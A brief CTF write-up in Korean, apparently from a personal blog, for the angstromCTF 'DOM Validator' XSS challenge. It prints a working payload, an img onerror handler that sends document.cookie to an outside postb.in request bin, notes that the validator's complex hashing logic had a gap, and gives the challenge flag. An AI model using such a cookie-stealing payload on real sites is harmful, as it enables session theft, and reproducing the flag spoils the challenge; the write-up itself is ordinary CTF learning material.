writeup

angstromCTF – DOM Validator

<!----><img src=x onerror="location='https://postb.in/xxxxxxxx?'+document.cookie">

XSS 필터링 문제인데, <head> 태그에서 자바스크립트로 문서 내용을 해싱하여 비교 검증하는 특이한 방식을 사용했다. 시도하다 보니 필터링 로직이 복잡하여 짜여 있다는 것을 알게 되었는데, 본래 복잡해질수록 허점도 생기는 법 아니겠는가.. 여러가지 페이로드를 확인해보니 결국 먹히는 것이 나왔다. (3시간 정도 걸렸다)

actf{its_all_relative}

Leave a Reply

Your email address will not be published. Required fields are marked *